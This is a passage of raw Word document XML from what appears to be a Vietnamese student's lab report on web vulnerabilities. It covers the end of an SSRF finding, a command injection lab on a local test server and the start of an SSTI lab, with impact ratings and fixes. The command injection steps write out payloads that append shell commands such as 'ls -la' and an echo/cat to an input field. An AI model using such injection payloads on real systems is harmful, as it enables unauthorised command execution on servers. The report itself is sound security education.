        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33C9124D" wp14:editId="43CFDF80">
            <wp:extent cx="6115050" cy="3107055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="284609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09527" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId126"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3107055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6FEBF2" w14:textId="584849BF" w:rsidR="007C62EC" w:rsidRPr="009D0400" w:rsidRDefault="007C62EC" w:rsidP="007C62EC">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00965CE1">
        <w:t>High (cao) vì lỗ hổng SSRF này có thể dẫn đến các cuộc tấn công từ xa, kiểm soát máy chủ, hoặc lợi dụng thông tin nhạy cảm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496DB172" w14:textId="4ADBAF3C" w:rsidR="00151DDF" w:rsidRDefault="007C62EC" w:rsidP="007C62EC">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00965CE1">
        <w:t>Cần thực hiện lọc và kiểm tra đầu vào của các trường URL được nhập vào để ngăn chặn việc thực hiện các yêu cầu không mong muốn từ máy chủ. Đồng thời, cần giáo dục người phát triển về nguy cơ của lỗ hổng SSRF và cách phòng tránh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB624D8" w14:textId="77777777" w:rsidR="007C62EC" w:rsidRPr="009328B7" w:rsidRDefault="007C62EC" w:rsidP="009328B7"/>
    <w:p w14:paraId="4CECBF32" w14:textId="5A51FBA7" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC2B2A8" w14:textId="1448D0D2" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc175959225"/>
      <w:bookmarkStart w:id="62" w:name="_Toc182909877"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0578E">
        <w:t>01: Command Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="70E8904F" w14:textId="7064866C" w:rsidR="001035B9" w:rsidRPr="001035B9" w:rsidRDefault="001035B9" w:rsidP="001035B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001035B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào: </w:t>
      </w:r>
      <w:hyperlink r:id="rId127" w:history="1">
        <w:r w:rsidRPr="001035B9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:8000/cmd_lab</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="455C96D7" w14:textId="4F11208D" w:rsidR="00F42CDC" w:rsidRPr="00F42CDC" w:rsidRDefault="00F42CDC" w:rsidP="00F42CDC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tiêu đề: </w:t>
      </w:r>
      <w:r w:rsidRPr="00896A3F">
        <w:t>Command Injection</w:t>
      </w:r>
      <w:r w:rsidR="003705F5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4CA002" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00D0578E" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00D0578E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0578E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C67B8">
        <w:t>Box nhập input của website có thể truyền shell và điều khiển được theo ý muốn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A369C9" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0578E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501DFD90" w14:textId="2003DC1A" w:rsidR="00EC0F26" w:rsidRPr="00F42CDC" w:rsidRDefault="00F42CDC" w:rsidP="00F42CDC">
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00F42CDC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Truy cập </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00F42CDC">
        <w:t>vào task và nhận thấy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29956A56" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00F42CDC" w:rsidRDefault="00EC0F26" w:rsidP="00F42CDC">
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="198EC1F0" wp14:editId="14B2D514">
            <wp:extent cx="6115050" cy="1877060"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="481244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44521" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId128"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1877060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="641D23BB" w14:textId="17B1E288" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00896A3F">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00896A3F">
        <w:t xml:space="preserve"> Có nghĩa là ở đây sẽ</w:t>
      </w:r>
      <w:r w:rsidR="00896A3F" w:rsidRPr="00896A3F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00896A3F">
        <w:t>thử</w:t>
      </w:r>
      <w:r w:rsidRPr="00896A3F">
        <w:t xml:space="preserve"> nhập một Domain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D61143">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>uit123</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00987AFF">
        <w:t xml:space="preserve"> và quan sát kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF0A981" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00987AFF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BA51F48" wp14:editId="78ADDDC7">
            <wp:extent cx="6115050" cy="2665730"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="933636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36755" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId129"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2665730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A39B45" w14:textId="70B89594" w:rsidR="00EC0F26" w:rsidRPr="00987AFF" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00987AFF">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00987AFF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00987AFF">
        <w:t>hấy có xuất hiện payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A888500" w14:textId="20C93AF3" w:rsidR="00EC0F26" w:rsidRDefault="00F42CDC" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00987AFF">
        <w:t xml:space="preserve"> Sử dụng kĩ thuật chèn payload như</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00987AFF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00D61143">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>uit123 &lt;dig&gt; 123; ls -la</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00987AFF">
        <w:t xml:space="preserve"> và quan sát kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12633029" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00D61143">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41220637" wp14:editId="51554D9C">
            <wp:extent cx="6115050" cy="2732405"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1507494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94865" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId130"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2732405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="023B6299" w14:textId="62E7476E" w:rsidR="00EC0F26" w:rsidRPr="00F42CDC" w:rsidRDefault="00EC0F26" w:rsidP="00F42CDC">
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nhận xét:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00896A3F">
        <w:t>Khi mà thực hiện chèn payload thì trình duyệt web gọi thẳng tới shell để thực hiện các câu lệnh trực tiếp trên shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4248EC" w14:textId="6A989251" w:rsidR="00EC0F26" w:rsidRPr="00F42CDC" w:rsidRDefault="00F42CDC" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00D61143">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00F42CDC">
        <w:t>hận thấy Payload đã thay đổi khi thực hiện giữa bước 1 và 2. Đến đây, có thể chèn 1 payload bất kỳ và quan sát kết quả,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00F42CDC">
        <w:t>có thể dùng đoạn payload này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F44832" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00F42CDC" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;dig&gt; uit123;  echo “This is the payload of ID: 21521879 - BINH” &gt; payload1879.txt; cat payload1879.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E829B6D" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00F42CDC" w:rsidRDefault="00EC0F26" w:rsidP="00F42CDC">
      <w:r w:rsidRPr="00F42CDC">
        <w:t xml:space="preserve">Kết quả: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039188C8" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00D0578E" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00D61143">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="508F4D83" wp14:editId="249D6D63">
            <wp:extent cx="6115050" cy="3088640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1354175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75841" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId131"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3088640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01390E84" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00894776" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00894776">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00894776">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:t>High (cao) vì lỗ hổng này cho phép kẻ tấn công thực thi lệnh trên server, gây nguy cơ kiểm soát hệ thống trái phép và khai thác dữ liệu nhạy cảm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EE97BA" w14:textId="2D30DA41" w:rsidR="00EC0F26" w:rsidRPr="00D0578E" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00D0578E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0578E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:t xml:space="preserve">Đảm bảo rằng tất cả các giá trị đầu vào từ người dùng được lọc và kiểm tra kỹ lưỡng trước khi được chấp nhận và xử lý trên trang web để ngăn chặn lỗ hổng </w:t>
      </w:r>
      <w:r w:rsidR="00896A3F" w:rsidRPr="00896A3F">
        <w:t xml:space="preserve">Command </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:t>Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503F6FC5" w14:textId="3B4F8A9E" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc175959226"/>
      <w:bookmarkStart w:id="64" w:name="_Toc182909878"/>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0578E">
        <w:t>02: Server-Side Template Injection (SSTI)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="5DD9FD16" w14:textId="17B6B41F" w:rsidR="001035B9" w:rsidRPr="001035B9" w:rsidRDefault="001035B9" w:rsidP="001035B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001035B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào: </w:t>
      </w:r>
      <w:hyperlink r:id="rId132" w:history="1">
        <w:r w:rsidRPr="001035B9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:8000/ssti/lab</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F6827EC" w14:textId="1B7E15A5" w:rsidR="00F42CDC" w:rsidRPr="00F42CDC" w:rsidRDefault="00F42CDC" w:rsidP="00F42CDC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tiêu đề: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:t>Server-Side Template Injection (SSTI)</w:t>
      </w:r>
      <w:r w:rsidR="003705F5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAFBC8E" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00D0578E" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00D0578E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0578E">
        <w:t xml:space="preserve"> Khung box thiết kế bị lỗi, khi người dùng nhập input vào Box thì có thể truy cập đến database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE161F5" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0578E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D77F40F" w14:textId="47C8EF55" w:rsidR="00EC0F26" w:rsidRDefault="00F42CDC" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="004F6ECF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26">
        <w:t>ruy cập vào task và quan sát thấy rằng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDAA743" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="004F6ECF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="467A3DCA" wp14:editId="5AA14B84">
            <wp:extent cx="6115050" cy="2767965"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="338614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14869" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId133"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2767965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="684F7793" w14:textId="702E0CD0" w:rsidR="00EC0F26" w:rsidRPr="00896A3F" w:rsidRDefault="00EC0F26" w:rsidP="00896A3F">
      <w:r w:rsidRPr="00896A3F">
        <w:t xml:space="preserve">Có một khung box để nhập thông tin. Vậy thử </w:t>
      </w:r>
      <w:r w:rsidR="00896A3F">
        <w:t xml:space="preserve">nhập </w:t>
      </w:r>
      <w:r w:rsidRPr="00896A3F">
        <w:t>như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAB321F" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="004F6ECF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78DAFEAF" wp14:editId="046989D2">
            <wp:extent cx="6115050" cy="2476500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1225532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32583" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId134"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2476500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AEA270" w14:textId="17ED63D9" w:rsidR="00EC0F26" w:rsidRPr="00896A3F" w:rsidRDefault="00896A3F" w:rsidP="00896A3F">
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00896A3F">
        <w:t>hấn POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00896A3F">
        <w:t>nhận được kết quả bình thường với những gì</w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC" w:rsidRPr="00896A3F">
        <w:t xml:space="preserve"> sau khi </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00896A3F">
        <w:t xml:space="preserve">nhập </w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC" w:rsidRPr="00896A3F">
        <w:t>vào Box</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239A47A1" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="004F6ECF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FD8F5B5" wp14:editId="21571857">
            <wp:extent cx="6115050" cy="2420620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1984088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88140" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId135"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2420620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BAB405" w14:textId="091C280B" w:rsidR="00EC0F26" w:rsidRPr="00F42CDC" w:rsidRDefault="00F42CDC" w:rsidP="00F42CDC">
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 2: </w:t>
      </w:r>
      <w:r w:rsidRPr="00896A3F">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00896A3F">
        <w:t>hực hiện kiểm t</w:t>
      </w:r>
      <w:r w:rsidR="00896A3F" w:rsidRPr="00896A3F">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00896A3F">
        <w:t>a code với nút View Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45990E11" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00F42CDC" w:rsidRDefault="00EC0F26" w:rsidP="00F42CDC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="254D978D" wp14:editId="2CBBBCD0">
            <wp:extent cx="4667490" cy="3746693"/>
